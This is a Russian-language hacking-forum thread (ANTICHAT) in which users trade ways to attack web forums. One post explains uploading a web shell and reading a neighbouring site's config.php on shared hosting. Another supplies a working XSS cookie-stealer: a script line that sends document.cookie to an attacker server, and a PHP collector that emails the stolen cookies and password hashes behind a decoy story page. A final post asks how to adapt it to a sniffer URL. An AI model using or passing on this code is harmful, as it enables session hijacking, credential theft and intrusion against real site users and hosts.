ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((

2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?

Правильно...Тока в админке можна и хеши посмотреть на юзерей...

Правильно, правильно: хэши и соль от паролей можно посмотреть. А так, толку от XSS на вторых версиях по моему мало.

__________________
Full DNS report

это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).

через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((

Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
Получаем примерно /my/seycas/na/site/111/www/html/
Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать.
Теоретически - это сработает. Практически, зависит от сервера.

__________________
Full DNS report

Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

затем заливаем на сервак который указали: фаилик test.php(c интересной историей например):
<?php
if(isset($QUERY_STRING));
{
$date=date('d.m.y:H:i:s');
mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\ nCookie:$QUERY_STRING");
}
header('Content-Type=text/html\n\n\n\n');
echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" .
"Есть у меня друг Костя, большой любитель представительниц женского пола.\n" .
"Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" .
"прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" .
"достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" .
"Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" .
"того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" .
"вообще больше \"баб не цепляет\".\n" .
" \n" .
"Гоша Севастопольский" .
"</pre></body></html>";
?>

в результате на мыло приходят cookies с хешами паролей )) просто и сердито.

Естественно удача тут очень сильно влияет

Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script>